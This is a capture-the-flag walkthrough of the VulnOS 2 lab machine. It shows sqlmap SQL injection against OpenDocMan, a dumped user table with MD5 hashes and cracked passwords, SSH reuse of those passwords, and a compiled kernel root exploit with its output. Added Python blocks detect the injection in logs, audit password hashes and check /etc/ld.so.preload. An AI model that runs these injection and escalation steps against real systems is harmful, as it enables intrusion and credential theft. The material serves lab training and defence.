tick.Tack

VulnOS: 2

VulnOS: 2 from Vulnhub


Nmap scan result

Nmap scan report for 192.168.0.110
Host is up (0.00042s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc
MAC Address: 08:00:27:33:5D:E9 (Cadmus Computer Systems)

Limited Shell

The index page is the introduction to VulnOSv2, which tells us the target website is under /jabc.

By examining the source code, we can see that the website is based on Drupal 7, but none of the existing exploits worked.

Then I turned to browsing every page. Finally, when I visited the Documentation page, I found some hidden text there, which tells the customers to visit /jabcd0cs/.

/jabcd0cs/ is running OpenDocMan version 1.2.7, which is vulnerable to SQL injection. There's already a PoC here.

Since the add_value parameter is exploitable, I'll leave the exploitation work to sqlmap.

# sqlmap -u 'http://192.168.0.110/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -p add_value --dump-all
---snip---
Database: jabcd0cs
Table: odm_user
[2 entries]
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | phone       | Email              | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | 5555551212  | webmin@example.com | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          | <blank>       |
| 2  | 555 5555555 | guest@example.com  | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
---snip---
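From the defender's side, the request above is the kind of thing a web server log records long before the database dump shows up. The following is an added example (not code from the original write-up or from OpenDocMan) that parses a few constructed Apache combined-format log lines and flags requests whose add_value parameter carries SQL syntax, or whose User-Agent announces an automated injector. The log lines, the parameter list and the function name analyze_access_log are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Apache combined format). Line 1 is a legitimate
# request to the same endpoint; lines 2 and 3 mimic what an automated injector
# leaves behind; line 4 is unrelated traffic to the Drupal site.
SAMPLE_LOG = """\
192.168.0.105 - - [19/Jun/2016:11:20:01 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.105 - - [19/Jun/2016:11:20:02 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.0"
192.168.0.105 - - [19/Jun/2016:11:20:03 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20ALL%20SELECT%20NULL%2Cusername%2Cpassword%20FROM%20odm_user--%20 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.0.105 - - [19/Jun/2016:11:21:00 +0200] "GET /jabc/?q=node/3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# SQL keywords and syntax that never belong in a plain column-name argument.
SQL_TOKENS = re.compile(
    r"\b(union|select|sleep|benchmark|information_schema)\b|--|/\*|'", re.I
)


def analyze_access_log(text, watched_params=("add_value",)):
    """Return one finding dict per suspicious request.

    A request is suspicious if a watched query parameter (after URL decoding)
    contains SQL tokens, or if the User-Agent identifies an injection tool.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        # parse_qs percent-decodes the values, so %27 becomes a quote etc.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        reasons = []
        for name in watched_params:
            for value in params.get(name, []):
                if SQL_TOKENS.search(value):
                    reasons.append(f"SQL syntax in {name}={value!r}")
        if m["ua"].lower().startswith("sqlmap"):
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append(
                {"ip": m["ip"], "time": m["ts"], "target": m["target"], "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in analyze_access_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["target"])
        for r in f["reasons"]:
            print("   -", r)
```

Only the two injected requests are reported; the legitimate `add_value=odm_user` lookup on the same endpoint is not, because the check is on the decoded parameter value rather than on the path. A tool that spoofs a browser User-Agent (line 3) is still caught by the SQL tokens, which is why the two signals are combined rather than relying on the agent string alone.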

Sqlmap has cracked the guest password for us. After throwing webmin's hashed password into an online MD5 cracker, it returned "webmin1980" as the result.

There's nothing more I can do with OpenDocMan even when logged in as webmin, so I decided to try a password reuse attack.
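The two hashes in the dump fall so quickly because they are plain, unsalted MD5: one table of hashed guesses matches every user at once, and the cracked value is then worth trying wherever the same person has an account. The block below is an added example (not code from the write-up or from OpenDocMan) that an administrator could run against a copied user table to find accounts whose password is in a small wordlist, and shows, for contrast, how a salted, iterated hash (PBKDF2-HMAC-SHA256 here) breaks the shared-table trick. The wordlist and the function names audit_unsalted_md5, hash_password and verify_password are assumptions made for the example; the two hash values are the ones shown in the sqlmap output above.

```python
import hashlib
import hmac
import os

# Username -> stored hash, copied from the dumped odm_user table above.
DUMPED_USERS = {
    "webmin": "b78aae356709f8c31118ea613980954b",
    "guest": "084e0343a0486ff05530df6c705c8bb4",
}

# Constructed, deliberately tiny wordlist for the audit.
WORDLIST = ["password", "123456", "guest", "admin", "webmin1980", "letmein"]

PBKDF2_ROUNDS = 200_000  # cost parameter; raise as hardware gets faster


def audit_unsalted_md5(users, wordlist):
    """Return {username: recovered_password or None}.

    Because the hashes carry no salt, the wordlist is hashed exactly once and
    the resulting table is reused for every account: the cost of checking N
    users is the same as checking one.
    """
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(h.lower()) for user, h in users.items()}


def hash_password(password, salt=None):
    """Store a password as 'saltHex$digestHex' using PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Constant-time comparison against a value produced by hash_password()."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def audit_salted(users, wordlist):
    """Same audit against salted hashes; returns (results, kdf_evaluations).

    Each user has a distinct salt, so no table can be shared: every guess has to
    be re-derived per account, and each derivation costs PBKDF2_ROUNDS rounds.
    """
    results, evaluations = {}, 0
    for user, stored in users.items():
        results[user] = None
        for word in wordlist:
            evaluations += 1
            if verify_password(word, stored):
                results[user] = word
                break
    return results, evaluations


if __name__ == "__main__":
    print("unsalted MD5:", audit_unsalted_md5(DUMPED_USERS, WORDLIST))
    salted = {u: hash_password(u) for u in DUMPED_USERS}  # constructed demo store
    print("salted PBKDF2:", audit_salted(salted, WORDLIST))
```

The MD5 audit does six hash computations in total regardless of how many users are in the table; the salted audit does one expensive derivation per user per guess, and the per-user salt also means two users with the same password get different stored values. Neither change helps against reuse of a password that has already leaked elsewhere, which is the separate point the SSH login below makes.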

# ssh webmin@192.168.0.110
webmin@192.168.0.110's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jun 19 11:25:46 CEST 2016

  System load:  0.0               Processes:           86
  Usage of /:   5.8% of 29.91GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 192.168.0.110
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sun Jun 19 11:25:46 2016 from 192.168.0.105
$

Privilege Escalation

As the welcome message says:

Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

Escalating privileges to root is easily done with this exploit.

$ gcc -o exploit 37292.c
$ chmod +x exploit
$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?
#
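The exploit output above leaves a durable artifact: it reports creating /etc/ld.so.preload, a file that does not exist on a default Ubuntu install and which, when present, causes every dynamically linked program to load the listed libraries first. The following is an added example (not code from the write-up or from the exploit) of a host check a defender could run or schedule: it reports whether the preload file exists, whether it and the libraries it names are root-owned and not world-writable, and whether any listed library lives outside the system library directories. The function names audit_ld_preload and demo, the trusted-directory list and the temporary files used by demo are assumptions made for the example.

```python
import os
import stat
import tempfile

# Directories a legitimately preloaded library would normally come from.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")


def audit_ld_preload(preload_path="/etc/ld.so.preload"):
    """Return a list of human-readable findings; an empty list means no concerns.

    Absence of the file is the expected state, so it produces no finding at all.
    """
    findings = []
    if not os.path.exists(preload_path):
        return findings
    findings.append(f"{preload_path} exists (absent on a default Ubuntu install)")

    st = os.stat(preload_path)
    if st.st_uid != 0:
        findings.append(f"{preload_path} is owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{preload_path} is world-writable")

    with open(preload_path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            lib = raw.strip()
            if not lib or lib.startswith("#"):
                continue  # ld.so ignores blank lines and comments
            if not lib.startswith(TRUSTED_LIB_DIRS):
                findings.append(f"preloaded library outside system lib dirs: {lib}")
            if not os.path.exists(lib):
                # A dangling entry is still worth reporting: it shows the file was tampered with.
                findings.append(f"preloaded library missing on disk: {lib}")
                continue
            lst = os.stat(lib)
            if lst.st_uid != 0 or lst.st_mode & stat.S_IWOTH:
                findings.append(f"preloaded library not root-owned or writable by others: {lib}")
    return findings


def demo():
    """Run the audit against a constructed preload file in a temporary directory.

    The library it points at is an empty, world-writable file under the temp dir,
    which trips the location and permission checks without touching /etc.
    """
    with tempfile.TemporaryDirectory() as tmp:
        lib = os.path.join(tmp, "preloaded.so")
        open(lib, "wb").close()
        os.chmod(lib, 0o666)
        preload = os.path.join(tmp, "ld.so.preload")
        with open(preload, "w", encoding="utf-8") as fh:
            fh.write("# constructed for the example\n")
            fh.write(lib + "\n")
        return audit_ld_preload(preload)


if __name__ == "__main__":
    for finding in audit_ld_preload():
        print("-", finding)
    print("demo findings:")
    for finding in demo():
        print("-", finding)
```

Run as root on a real host the first loop checks the live /etc/ld.so.preload; the demo() call exercises the checks without modifying anything. The same presence check belongs in a file-integrity baseline, since the file's mere appearance is the signal, independent of what it currently lists.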